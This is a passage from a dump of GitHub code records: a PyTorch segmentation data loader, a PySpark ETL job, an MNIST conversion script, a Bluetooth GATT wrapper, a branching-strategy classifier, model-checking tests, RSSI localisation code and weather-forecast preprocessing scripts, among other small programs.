shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n\n return train_loader, val_loader\n\ndef get_test_loader(batch_size=16, shuffle=False, num_workers=4, pin_memory=False):\n\n \"\"\"Utility function for loading and returning training and validation Dataloader\n :param root_dir: the root directory of data set\n :param batch_size: batch size of training and validation set\n :param shuffle: if shuffle the image in training and validation set\n :param num_workers: number of workers loading the data, when using CUDA, set to 1\n :param pin_memory: store data in CPU pin buffer rather than memory. 
when using CUDA, set to True\n :return:\n - testloader: Dataloader of all the test set\n \"\"\"\n transformed_dataset = RSNADatasetTest(root_dir=opt.test_root)\n testloader = DataLoader(transformed_dataset, batch_size=batch_size,\n shuffle=shuffle, num_workers=num_workers, pin_memory=pin_memory)\n return testloader\n\ndef show_batch_train(sample_batched):\n \"\"\"\n Visualize one training image and its corresponding bbox\n \"\"\"\n img_id, image, mask = sample_batched['img_id'], sample_batched['image'], sample_batched['mask']\n image, mask = np.squeeze(at.tonumpy(image)), np.squeeze(at.tonumpy(mask))\n\n image = inverse_normalize(image)\n\n combined = np.multiply(image, mask)\n ax1 = plt.subplot(121)\n ax1.imshow(image / 255.)\n ax1.set_title(img_id[0])\n ax2 = plt.subplot(122)\n ax2.imshow(combined / 255.)\n ax2.set_title(img_id[0])\n plt.show()\n\ndef show_batch_test(sample_batch):\n img_id, image = sample_batch['img_id'], sample_batch['image']\n image = inverse_normalize(np.squeeze(at.tonumpy(image[0])))\n plt.figure()\n plt.imshow(image/255)\n plt.show()\n\n\nif __name__ == '__main__':\n\n # Load training & validation set\n # train_loader, val_loader = get_train_val_loader(opt.root_dir, batch_size=1, val_ratio=0.2,\n # shuffle=False, num_workers=opt.num_workers,\n # pin_memory=opt.pin_memory)\n # for i_batch, sample in enumerate(val_loader):\n # print(sample['img_id'], ', ', sample['image'].shape, ', ', sample['mask'].shape)\n # show_batch_train(sample)\n\n test_loader = get_test_loader(batch_size=1, shuffle=False,\n num_workers=opt.num_workers,\n pin_memory=opt.pin_memory)\n for i_batch, sample in enumerate(test_loader):\n print(sample['img_id'], ', ', sample['image'].shape)\n show_batch_test(sample)\n","repo_name":"limingwu8/Lung-Segmentation","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10147,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"77"} +{"seq_id":"30494291318","text":"\"\"\"\nClass Property Transform\n\n@author Irfan Andriansyah \n\"\"\"\n\nimport os\nimport sys\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql.types import StringType\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nfrom helper.parser_helper import Parser # noqa\nfrom helper.spark.spark_helper import SparkHelper # noqa\nfrom helper.config.config_helper import get_config # noqa\n\n\nclass PropertyTracker:\n \"\"\"\n Transform data for property tracker\n \"\"\"\n\n def __init__(self):\n self.connection = SparkHelper.create_connection()\n self.parser = Parser()\n self.config = get_config()\n\n @staticmethod\n def get_udf(key, parse):\n \"\"\"\n Get User definition function for transform data search tracker\n \"\"\"\n return udf(lambda params: parse(key, params), StringType())\n\n @staticmethod\n def get_agent_name(firstName, lastName):\n \"\"\"\n Get firstName & lastName from user dataframe\n \"\"\"\n return '{} {}'.format(firstName, lastName)\n\n def get_parquet(self):\n \"\"\"\n Get Tracker parquet\n \"\"\"\n return SparkHelper.read_parquet(\n self.connection, self.config.get('data_source', 'result')\n )\n\n def main(self):\n \"\"\"\n Main Class for transform tracket dataset to search dataset\n \"\"\"\n\n aggent_udf = udf(self.get_agent_name, StringType())\n df_tracker = self.get_parquet().filter(\"event_category = 'Property'\")\n df_property = self.connection.read.csv(\n \"test/resources/properties.csv\", header=True\n )\n df_user = self.connection.read.csv(\n 
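A minimal sketch of the custom `Dataset`/`DataLoader` pattern used in the `dataset.py` record above, with synthetic arrays standing in for the RSNA images and masks (the `ToyDataset` name and shapes are illustrative, not part of the original):

```python
import numpy as np
from torch.utils.data import Dataset, DataLoader

class ToyDataset(Dataset):
    def __init__(self, n=8, size=16):
        self.images = np.random.rand(n, 3, size, size).astype(np.float32)
        self.masks = (np.random.rand(n, 1, size, size) > 0.5).astype(np.uint8)

    def __len__(self):
        return len(self.images)

    def __getitem__(self, idx):
        # .copy() avoids handing loader workers views into shared arrays,
        # mirroring the sample = {... image.copy() ...} idiom in the record
        return {"image": self.images[idx].copy(), "mask": self.masks[idx].copy()}

loader = DataLoader(ToyDataset(), batch_size=4, shuffle=True, num_workers=0)
for batch in loader:
    # default collation turns the numpy arrays into batched torch tensors
    print(batch["image"].shape, batch["mask"].shape)
```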
\"test/resources/user.csv\", header=True\n )\n\n retval = df_tracker.join(\n df_property, df_tracker.event_label == df_property.id\n ).join(df_user, df_property.submitterId == df_user.id)\n\n retval.select(\n df_property.id.alias('properties_id'),\n df_property.listingType.alias('listing_type'),\n df_property.price.alias('property_price'),\n df_property.localityString.alias('property_locality'),\n df_property.latitude.alias('property_latitude'),\n df_property.longitude.alias('property_longitude'),\n df_property.showOnLanding.alias('property_is_show_on_landing'),\n df_property.featureType.alias('property_is_featured_type'),\n df_property.localityId.alias('property_locality_id'),\n aggent_udf(df_user.firstName,\n df_user.lastName).alias('property_agent_name'),\n df_user.userType.alias('property_agent_type'),\n df_property.marketType.alias('property_market_type'),\n df_tracker.event_sessionID.alias('session_id')\n ).show()\n\n\nif __name__ == '__main__':\n PropertyTracker().main()\n","repo_name":"mochnurhalimizd/etl-data","sub_path":"transform/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37080758957","text":"\"\"\"\nConvert MNIST data to monomer data\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport random\n\nimport numpy as np\n\nfrom scipy.misc import imresize\n\nfrom ..input_data import SemiMNIST\nfrom ..input_data import dump_array\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--output-dir', required=True)\n parser.add_argument('--data-path', default='data/MNIST_data')\n parser.add_argument(\n '--output-shape', type=int, nargs='+', default=(28, 28, 1))\n parser.add_argument('--labeled-percent', type=float, default=0.05)\n parser.add_argument('--all-digits', action='store_true')\n parser.add_argument('--symmetric', action='store_true', help='symmetric')\n parser.add_argument('--resample', action='store_true', help='resample')\n parser.add_argument(\n '--all-random',\n action='store_true',\n help='each base digit only sample'\n 'either negative or positive but not both'\n 'for each sample-rate')\n parser.add_argument('--sample-rate', type=int, default=1)\n parser.add_argument('--seed', type=int, default=633)\n args = parser.parse_args()\n assert len(args.output_shape) == 3\n\n convert(**vars(args))\n\n\ndef convert(output_dir, output_shape, labeled_percent, all_digits, data_path,\n symmetric, resample, all_random, sample_rate, seed):\n data_type = 'diffone' if not all_digits else 'diffone_all'\n data_splits = [\n ('train', SemiMNIST(\n data_type=data_type,\n path=data_path,\n split='train',\n labeled_percent=labeled_percent,\n all_random=all_random,\n sample_rate=sample_rate,\n symmetric=symmetric,\n resample=resample,\n seed=seed)),\n ('val', SemiMNIST(\n data_type=data_type,\n path=data_path,\n split='validation',\n all_random=all_random,\n sample_rate=sample_rate,\n labeled_percent=labeled_percent,\n symmetric=symmetric,\n resample=resample,\n seed=seed)),\n ('test', SemiMNIST(\n data_type=data_type,\n path=data_path,\n split='test',\n all_random=all_random,\n sample_rate=sample_rate,\n symmetric=symmetric,\n resample=resample,\n labeled_percent=1.0,\n seed=seed)),\n ]\n\n start_num = 0\n\n for split, data in data_splits:\n split_path = os.path.join(output_dir, split)\n os.makedirs(split_path, exist_ok=True)\n\n # dump features & categories\n images = 
data.mnist._images\n labels = data.mnist._labels\n logger.warning('%s: %d images', split, images.shape[0])\n if tuple(output_shape[:2]) != (28, 28):\n images = np.array([\n imresize(image.reshape((28, 28)), output_shape[:2])\n for image in images\n ]).reshape((-1,\n output_shape[0] * output_shape[1])).astype(np.float32)\n images /= 255.\n\n fea_path = os.path.join(split_path, 'features.b')\n meta_path = os.path.join(split_path, 'meta.txt')\n\n with open(fea_path, 'wb') as outfile_fea, open(meta_path,\n 'w') as outfile_meta:\n for i in range(images.shape[0]):\n seq_num = start_num + i\n\n product_id = '{}{:09x}'.format(labels[i], seq_num)\n outfile_fea.write(product_id.encode('ascii'))\n dump_array(outfile_fea, images[i])\n\n digit_type = 'bottom' if labels[i] < 5 else 'top'\n outfile_meta.write(\n '{}\\n digits,{}\\n'.format(product_id, digit_type))\n\n pos_path = os.path.join(split_path, 'pairs_pos.txt')\n neg_path = os.path.join(split_path, 'pairs_neg.txt')\n all_path = os.path.join(split_path, 'pairs_all.txt')\n\n tasks = [\n (pos_path, data.pairs_pos, 1),\n (neg_path, data.pairs_neg, 0),\n ]\n all_pairs = []\n for path, edges, label in tasks:\n with open(path, 'w') as outfile:\n for i in range(edges.shape[0]):\n edge = edges[i]\n label1 = labels[edge[0]]\n label2 = labels[edge[1]]\n id1 = edge[0] + start_num\n id2 = edge[1] + start_num\n outfile.write('{}{:09x} match {}{:09x}\\n'.format(\n label1, id1, label2, id2))\n all_pairs.append((label1, id1, label2, id2, label))\n\n random.seed(seed)\n random.shuffle(all_pairs)\n with open(all_path, 'w') as outfile:\n for label_from, edge_from, label_to, edge_to, label in all_pairs:\n outfile.write('{}{:09x} match {}{:09x} {}\\n'.format(\n label_from, edge_from, label_to, edge_to, label))\n\n start_num += images.shape[0]\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"appier/compatibility-family-learning","sub_path":"cfl/scripts/convert_mnist.py","file_name":"convert_mnist.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"77"} +{"seq_id":"13135161792","text":"from .cbindings import *\nfrom .cbindings import _Gatt, _Option\nfrom .gattchar import GattChar\nfrom . import WarbleException, str_to_bytes, bytes_to_str\nfrom ctypes import cast, POINTER\n\nimport platform\n\nclass Gatt:\n def __init__(self, mac, **kwargs):\n \"\"\"\n Creates a Python Warble Gatt object\n @params:\n mac - Required : mac address of the board to connect to e.g. 
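The id scheme in the `convert_mnist.py` record above packs a digit label and a sequence number into one token — the label character followed by a 9-digit hex counter — which is why `'{}{:09x}'` appears in both the feature and pair writers. A worked round trip:

```python
def product_id(label: int, seq_num: int) -> str:
    return '{}{:09x}'.format(label, seq_num)

pid = product_id(7, 255)
print(pid)             # 70000000ff
label = int(pid[0])    # the leading character recovers the digit label
seq = int(pid[1:], 16) # the remaining 9 hex digits recover the counter
print(label, seq)      # 7 255
```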
E8:C9:8F:52:7B:07\n hci - Optional : mac address of the hci device to use, only applicable on Linux\n addr_type - Optional : ble device adress type, defaults to random\n \"\"\"\n \n self.gatt = cast(None, POINTER(_Gatt))\n if (len(kwargs) != 0):\n options = []\n\n options.append(['mac', mac])\n if ('hci' in kwargs and platform.system() == 'Linux'):\n options.append(['hci', kwargs['hci']])\n if ('addr_type' in kwargs):\n options.append(['addr_type', kwargs['addr_type']])\n\n coptions = (_Option * len(options))()\n for i, v in enumerate(options):\n coptions[i] = _Option(key = str_to_bytes(v[0]), value = str_to_bytes(v[1]))\n\n self.gatt = libwarble.warble_gatt_create_with_options(len(options), cast(coptions, POINTER(_Option)))\n else:\n self.gatt = libwarble.warble_gatt_create(str_to_bytes(mac))\n\n self.characteristics = {}\n\n def __del__(self):\n libwarble.warble_gatt_delete(self.gatt)\n self.characteristics = {}\n\n @property\n def is_connected(self):\n return libwarble.warble_gatt_is_connected(self.gatt) != 0\n\n def connect_async(self, handler):\n \"\"\"\n Establishes a connection to the remote device\n @params:\n handler - Required : `(Exception) -> void` function that will be executed when the connect task is completed\n \"\"\"\n def completed(ctx, caller, msg):\n if (msg == None):\n handler(None)\n else:\n handler(WarbleException(bytes_to_str(msg)))\n\n self.connect_handler = FnVoid_VoidP_WarbleGattP_CharP(completed)\n libwarble.warble_gatt_connect_async(self.gatt, None, self.connect_handler)\n\n def disconnect(self):\n \"\"\"\n Closes the connection with the remote device\n \"\"\"\n libwarble.warble_gatt_disconnect(self.gatt)\n\n def on_disconnect(self, handler):\n \"\"\"\n Sets a handler to listen for disconnect events\n @params:\n handler - Required : `(int) -> void` function that will be executed when connection is lost\n \"\"\"\n def event_fired(ctx, caller, status):\n self.characteristics = {}\n handler(status)\n\n self.disconnect_handler = FnVoid_VoidP_WarbleGattP_Int(event_fired)\n libwarble.warble_gatt_on_disconnect(self.gatt, None, self.disconnect_handler)\n\n def find_characteristic(self, uuid):\n \"\"\"\n Find the GATT characteristic corresponding to the uuid value\n @params:\n uuid - Required : 128-bit UUID string to search for\n \"\"\"\n if (uuid not in self.characteristics):\n result = libwarble.warble_gatt_find_characteristic(self.gatt, str_to_bytes(uuid))\n self.characteristics[uuid] = GattChar(self, result) if bool(result) else None\n return self.characteristics[uuid]\n\n def service_exists(self, uuid):\n \"\"\"\n Check if a GATT service with the corresponding UUID exists on the device\n @params:\n uuid - Required : 128-bit UUID string to search for\n \"\"\"\n return libwarble.warble_gatt_has_service(self.gatt, str_to_bytes(uuid)) != 0\n","repo_name":"mbientlab/PyWarble","sub_path":"mbientlab/warble/gatt.py","file_name":"gatt.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"20840978788","text":"import json\nimport os\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\nTrunk based = only 1 branch\nGithub Flow = master and feature branches\nGitFlow = master, develop and feature branches\n\"\"\"\n\n# address_folder = \"E://Json files (Mono)/Productivity\"\n# external_folder = \"E://Json files (Mono)/DB branching\"\n\naddress_folder = \"E://Json files (Multi)/New Database\"\nexternal_folder = \"E://Json files (Multi)/DB 
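The `gatt.py` record above stores each callback on `self` (e.g. `self.connect_handler`) before passing it to the C library. That is the standard ctypes keep-alive pattern; a minimal illustration of why it matters, independent of warble:

```python
import ctypes

CALLBACK = ctypes.CFUNCTYPE(None, ctypes.c_int)

class Wrapper:
    def register(self, handler):
        # The CFUNCTYPE object must stay referenced on the Python side for as
        # long as native code may invoke it; a bare local would be garbage-
        # collected after register() returns, leaving C a dangling pointer.
        self._cb = CALLBACK(handler)
        return self._cb

w = Wrapper()
cb = w.register(lambda status: print("status:", status))
cb(0)  # simulate the native side firing the callback
```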
branching\"\n\n\ndef define_branch_strategy_gitFlow(branch_list):\n master = False\n dev = False\n if 'master' in branch_list or 'main' in branch_list:\n master = True\n\n for each_branch in branch_list:\n if 'dev' in each_branch:\n dev = True\n break\n\n if dev and master:\n return True\n else:\n return False\n\n\nmono_count = 0\ndouble_count = 0\ntriple_count = 0\ncount = 0\n\ntotal_count = len(os.listdir(address_folder))\n\nerrors = []\n\n''' ********************* Mono Repository ********************************* '''\n# for each_file in os.listdir(address_folder):\n# count += 1\n#\n# print(total_count - count)\n#\n# if '.json' in each_file:\n# with open(address_folder + '/' + each_file, 'r', encoding=\"utf8\") as file:\n# file_content = json.load(file)\n#\n# branch_list = []\n#\n# for each_branch in file_content['branches']:\n# if 'dependabot' not in each_branch['name']:\n# branch_list.append(each_branch['name'])\n#\n# try:\n# if len(branch_list) == 1:\n# mono_count += 1\n# file_content['Branching strategy'] = 'Trunk-Based'\n#\n# elif len(branch_list) >= 2 and define_branch_strategy_gitFlow(branch_list):\n# triple_count += 1\n# file_content['Branching strategy'] = 'GitFlow'\n#\n# elif not define_branch_strategy_gitFlow(branch_list) and len(branch_list) > 1:\n# double_count += 1\n# file_content['Branching strategy'] = 'Github Flow'\n#\n# elif len(branch_list) == 0:\n# file_content['Branching strategy'] = 'None'\n#\n# if file_content['Branching strategy']:\n# json_data = json.dumps(file_content)\n# jsonFile = open(external_folder + '/' + each_file, \"w\")\n# jsonFile.write(json_data)\n# jsonFile.close()\n\n# except Exception as error:\n# print(error)\n# errors.append(each_file)\n#\n#\n# print(errors)\n# print(len(errors))\n\n''' ********************* Multi Repository ********************************* '''\nfor each_file in os.listdir(address_folder):\n count += 1\n\n print(total_count - count)\n\n if '.json' in each_file:\n with open(address_folder + '/' + each_file, 'r', encoding=\"utf8\") as file:\n file_content = json.load(file)\n\n branch_list_front = []\n branch_list_back = []\n\n try:\n for each_branch in file_content['Front Repositories']['branches']:\n if 'dependabot' not in each_branch['name']:\n branch_list_front.append(each_branch['name'])\n\n if len(branch_list_front) == 1:\n mono_count += 1\n file_content['Front Repositories']['Branching strategy'] = 'Trunk-Based'\n\n elif len(branch_list_front) >= 2 and define_branch_strategy_gitFlow(branch_list_front):\n triple_count += 1\n file_content['Front Repositories']['Branching strategy'] = 'GitFlow'\n\n elif not define_branch_strategy_gitFlow(branch_list_front) and len(branch_list_front) > 1:\n double_count += 1\n file_content['Front Repositories']['Branching strategy'] = 'Github Flow'\n\n elif len(branch_list_front) == 0:\n file_content['Front Repositories']['Branching strategy'] = 'None'\n\n # *******************************************************************************************\n\n for each_branch in file_content['Back Repositories']['branches']:\n if 'dependabot' not in each_branch['name']:\n branch_list_back.append(each_branch['name'])\n\n if len(branch_list_back) == 1:\n mono_count += 1\n file_content['Back Repositories']['Branching strategy'] = 'Trunk-Based'\n\n elif len(branch_list_back) >= 2 and define_branch_strategy_gitFlow(branch_list_back):\n triple_count += 1\n file_content['Back Repositories']['Branching strategy'] = 'GitFlow'\n\n elif not define_branch_strategy_gitFlow(branch_list_back) and len(branch_list_back) 
> 1:\n double_count += 1\n file_content['Back Repositories']['Branching strategy'] = 'Github Flow'\n\n elif len(branch_list_back) == 0:\n file_content['Back Repositories']['Branching strategy'] = 'None'\n\n json_data = json.dumps(file_content)\n jsonFile = open(external_folder + '/' + each_file, \"w\")\n jsonFile.write(json_data)\n jsonFile.close()\n\n except Exception as error:\n print(error)\n print(each_file)\n continue\n\n","repo_name":"Shakikhanli/Statistics","sub_path":"Define Branching stratgey.py","file_name":"Define Branching stratgey.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4974282836","text":"import math\na = [-100,5,2,3,4,9,10,5,6,7,8,100]\nn = len(a)\nl = []\nt = []\nstartOf = []\nfor i in range(n):\n t.append(0)\n l.append(0)\n startOf.append(0)\nstartOf[1] = n-1\nm = 1\n\ndef findInSO(i, a, startOf, m):\n inf = 1\n sup = m+1\n while(inf + 1 < sup):\n median = math.floor((inf + sup)/2)\n j = startOf[median]\n if a[j] > a[i]:\n inf = median\n else:\n sup = median\n return startOf[inf]\n\ndef optimize(a, l, t, n, m, startOf):\n l[n-1] = 1\n for i in range(n-2,-1,-1):\n j = findInSO(i, a, startOf, m)\n k = l[j]+1\n if(k > m):\n m = k\n startOf[k] = i\n else:\n if a[i] > a[startOf[k]]:\n startOf[k] = i\n l[i]=k\n t[i]=j\n\n\n\noptimize(a,l,t,n,m, startOf)\nprint(\"a\", a)\nprint(\"l\", l)\nprint(\"t\", t)\nprint(\"startOf\", startOf)\nresult = []\nseqLen = l[0]\nresult.append(a[0])\nfor i in range(1,n):\n if(l[i] == seqLen - 1):\n result.append(a[i])\n seqLen = seqLen - 1\nprint(\"result\", result)\n","repo_name":"hongvo2308/learning","sub_path":"Algorithms/dynamic_planning/longest_sub_sequence0.py","file_name":"longest_sub_sequence0.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21494312585","text":"import timewinder\nimport pytest\n\nfrom timewinder.generators import Set\nfrom timewinder.evaluation import ConstraintError\nfrom timewinder.evaluation import StutterConstraintError\n\n\n@timewinder.object\nclass Account:\n def __init__(self, name, amt):\n self.name = name\n self.acc = amt\n\n\ndef test_overdraft_1():\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n @timewinder.process\n def withdraw(sender, reciever, amount):\n sender.acc = sender.acc - amount\n yield \"deposit\"\n reciever.acc = reciever.acc + amount\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[withdraw(alice, bob, 3)],\n specs=[no_overdrafts],\n )\n ev.evaluate()\n ev._print_state_space()\n assert ev.stats.states == 3\n\n\ndef test_overdraft_initial_conditions():\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n @timewinder.process\n def withdraw(sender, reciever, amount):\n sender.acc = sender.acc - amount\n yield \"deposit\"\n reciever.acc = reciever.acc + amount\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[withdraw(alice, bob, Set(range(1, 7)))],\n specs=[no_overdrafts],\n )\n\n got_error = False\n try:\n ev.evaluate()\n except ConstraintError as e:\n got_error = True\n print(e.name)\n print(e.thunk)\n\n assert got_error\n assert ev.stats.states == 12\n\n\n@pytest.mark.benchmark(group=\"practical_tla_1\")\ndef test_check_and_withdraw_reinterp(benchmark):\n @timewinder.process\n def 
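For comparison with the `longest_sub_sequence0.py` record above, which builds its answer from per-index lengths and a `startOf` table: the textbook O(n log n) longest-increasing-subsequence length via `bisect`, run on the same input:

```python
from bisect import bisect_left

def lis_length(seq):
    tails = []  # tails[k] = smallest tail of an increasing subsequence of length k+1
    for x in seq:
        i = bisect_left(tails, x)
        if i == len(tails):
            tails.append(x)
        else:
            tails[i] = x
    return len(tails)

print(lis_length([-100, 5, 2, 3, 4, 9, 10, 5, 6, 7, 8, 100]))  # 9
```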
check_and_withdraw(sender, reciever, amt):\n if amt <= sender.acc:\n sender.acc = sender.acc - amt\n yield \"deposit\"\n reciever.acc = reciever.acc + amt\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n def reset_and_eval():\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n ],\n specs=[no_overdrafts],\n )\n ev.evaluate(steps=10)\n return ev.stats\n\n stats = benchmark(reset_and_eval)\n\n assert stats.states == 225\n\n\ndef test_liveness_reinterp():\n @timewinder.process\n def check_and_withdraw(sender, reciever, amt):\n if amt <= sender.acc:\n sender.acc = sender.acc - amt\n yield \"deposit\"\n reciever.acc = reciever.acc + amt\n\n no_overdrafts = timewinder.ForAll(Account, lambda a: a.acc >= 0)\n\n @timewinder.predicate\n def consistent_total(a, b):\n total = a.acc + b.acc\n return total == 10\n\n alice = Account(\"alice\", 5)\n bob = Account(\"bob\", 5)\n\n eventually_consistent = timewinder.Eventually(\n timewinder.Always(consistent_total(alice, bob))\n )\n\n ev = timewinder.Evaluator(\n objects=[alice, bob],\n threads=[\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n check_and_withdraw(alice, bob, Set(range(1, 6))),\n ],\n specs=[\n no_overdrafts,\n eventually_consistent,\n ],\n )\n\n got_error = False\n try:\n ev.evaluate(steps=10)\n except StutterConstraintError as s:\n got_error = True\n print(\"\\n\" + s.name + \"\\n\")\n ev.replay_thunk(s.thunk)\n\n assert got_error\n","repo_name":"timewinder-dev/timewinder-prototype","sub_path":"tests/reinterp/test_practical_tla_chap_1_reinterp.py","file_name":"test_practical_tla_chap_1_reinterp.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"16696815901","text":"velocity = float(input(\"Enter the velocity of the particle: \"))\ntarget_height = float(input(\"Enter the height of the particle of which you want to find the time of (in meters): \"))\n\n\nv = velocity\ng = 9.8 # makes sure the code only applies to problems on Earth\nh = 0\nt = 0\n\ndef height(v0, h0, t):\n inc = 0.0005\n v, h = v0, h0\n for i in range(int(t / inc)):\n v -= g * inc\n h += v * inc\n return h\n\n\ndef average(a, b):\n return (a + b) / 2\n\n\ndef bin_search(f, lower, upper, target):\n for i in range(40):\n avg = average(lower, upper)\n guess = f(29, 0, avg)\n if guess == target:\n return avg\n if guess < target:\n upper = avg\n else:\n lower = avg\n return avg\n\n\nprint( \"It takes \"+ str(bin_search(height, 0, 10000, target_height)) + \" seconds for the particle to reach \" + str(target_height) + \" meters\" )\n","repo_name":"ThilakBS/Math-Code","sub_path":"Calc-Finding T given H.py","file_name":"Calc-Finding T given H.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43709847007","text":"# Write a Python function that takes two lists \r\n#and returns True if they have at least one common member\r\n\r\n# lst1 = [1,2,3,4,5]\r\n# lst2 = [5,6,7,8,9]\r\n# for i in lst1:\r\n# for j in lst2:\r\n# if i == j:\r\n# res = True\r\n# break\r\n# else:\r\n# res = False\r\n# print(res)\r\n\r\n# lst1 = [1,2,3,4,5]\r\n# lst2 = [6,7,8,9]\r\n\r\n# for i in lst1:\r\n# for j in lst2:\r\n# if i == j:\r\n# res = True\r\n# break\r\n# else:\r\n# res = False\r\n# 
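The projectile record above finds the time for a given height by bisecting over a step-wise simulation (note it hardcodes `f(29, 0, avg)`, so the entered velocity is only used for the prompt). A closed-form cross-check, assuming the same h(t) = v·t − g·t²/2 model:

```python
from math import sqrt

def time_to_height(v, h, g=9.8):
    # ascending root of h = v*t - g*t**2/2, i.e. the first time height h is reached
    disc = v * v - 2 * g * h
    if disc < 0:
        raise ValueError("height is above the apex v**2 / (2*g)")
    return (v - sqrt(disc)) / g

print(time_to_height(29, 20))  # ~0.80 s, matching the bisected estimate
```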
print(res)\r\n\r\ndef common_data(list1, list2):\r\n result = False\r\n for x in list1:\r\n for y in list2:\r\n if x == y:\r\n result = True\r\n return result\r\nprint(common_data([1,2,3,4,5], [5,6,7,8,9]))\r\nprint(common_data([1,2,3,4,5], [6,7,8,9]))\r\n","repo_name":"mumbikernikhil/Python-Imp-Codes","sub_path":"Python Programs/List/18. chk common elements.py","file_name":"18. chk common elements.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7267074747","text":"from math import sqrt\nimport pandas as pd \nimport sympy\nimport numpy as np \nimport itertools\n\nRSSI_threshold = 90\n\n\ndef distance_to_BS(rssi, a=54, n=4):\n \"\"\"\n 根据RSSI计算距离\n :param rssi:\n :param a: 距离发射器1m时的RSSI值,单位:-dbm,默认为42\n :param n: 衰减系数,默认为3.3\n :return:\n \"\"\"\n return 10 ** ((abs(rssi) - a) / (10 * n)) if abs(rssi) < RSSI_threshold else None\n\n\ndef locate_by_pointlist(point_list: list): #两点定位\n \"\"\"\n 根据已知节点坐标和各自到未知节点的距离估计未知节点的位置\n :param point_list: [x, y ,distance]\n :return: 未知节点的坐标\n \"\"\"\n x = 0\n y = 0\n temp_list = point_list.copy()\n for p in temp_list:\n if p[2] is None:\n point_list.remove(p)\n num = len(point_list)\n temp_list = point_list.copy()\n if num == 2:\n for p1 in point_list:\n temp_list.remove(p1)\n for p2 in temp_list:\n p2p = distance(p1, p2)\n dist_sum = p1[2] + p2[2]\n if dist_sum <= p2p:\n x += p1[0] + (p2[0] - p1[0])*p1[2] / dist_sum\n y += p1[1] + (p2[1] - p1[1])*p1[2] / dist_sum\n else:\n dr = p2p / 2 + (p1[2]**2 - p2[2]**2) / (2 * p2p)\n x += p1[0] + (p2[0] - p1[0])*dr / p2p\n y += p1[1] + (p2[1] - p1[1])*dr / p2p\n #x /= num\n #y /= num\n elif num >=3:\n x, y = three_point(point_list)\n elif num == 1:\n x = point_list[0][0]\n y = point_list[0][1]\n # x /= (num*(num-1))/2\n # x /= (num*(num-1))/2\n return x, y\n\n\ndef distance(p1, p2):\n return sqrt((p1[0] - p2[0])**2 + (p1[1] - p2[1])**2)\n\ndef three_point(point_list: list): #三点定位\n temp_list = point_list.copy()\n for p in temp_list:\n if p[2] is None:\n point_list.remove(p)\n\n sumX=0.0\n sumY=0.0\n\n min=temp_list[0][2]\n min_p=temp_list[0]\n for p in temp_list:\n if(p[2] 1 else JST1\n\nJST2 = JST1 + timedelta(days=COM.GFS_DAYS)\nJST2 = datetime.strptime(sys.argv[2][:8],\"%Y%m%d\") + timedelta(days=1) if len(sys.argv) > 2 else JST2\n\nSTEP = 1\nSTEP = int(sys.argv[3]) if len(sys.argv) > 3 else STEP\n\n## 動作モードにより出力先をスイッチ\n#OUT_PATH = \"./forecast\" if FORECAST else \"./hindcast\"\nOUT_PATH = COM.FCST_PATH if FORECAST else COM.HCST_PATH\nos.makedirs(OUT_PATH, exist_ok=True)\n\n\n###########################################\n## GFSファイルの列挙\nDAYS = (JST2-JST1).days\nCSV_TIME = COM.CSV_TIME\nCSV_ZONE = COM.CSV_ZONE\nGFS_INIT = COM.GFS_INIT\nGFS_DAYS = COM.GFS_DAYS\nGFS_TIME = 'UTC'\n\n## JST1を含む直近のUTC1\nUTC1 = JST1 + timedelta(hours=GFS_INIT)\nUTC2 = JST2 + timedelta(hours=GFS_INIT)\nwhile UTC1 + timedelta(hours=9) > JST1:\n UTC1 -= timedelta(days=1)\n UTC2 -= timedelta(days=1)\n\nGFS_PATH = []\nGFS_ROOT = COM.DATA_PATH\nfor d in range(0,DAYS,STEP):\n UTC = UTC1 + timedelta(days=d)\n GFS = GFS_ROOT +\"/\"+ \"gfs_%s%02d_%03d.nc\"%(UTC.strftime(\"%Y%m%d\"),GFS_INIT,24*GFS_DAYS)\n if os.path.exists(GFS): GFS_PATH += [GFS]\n\n##\nprint(\"utc1:\", UTC1)\nprint(\"utc2:\", UTC2)\nprint(\"gfs:\", GFS_PATH)\nprint(\"out:\", 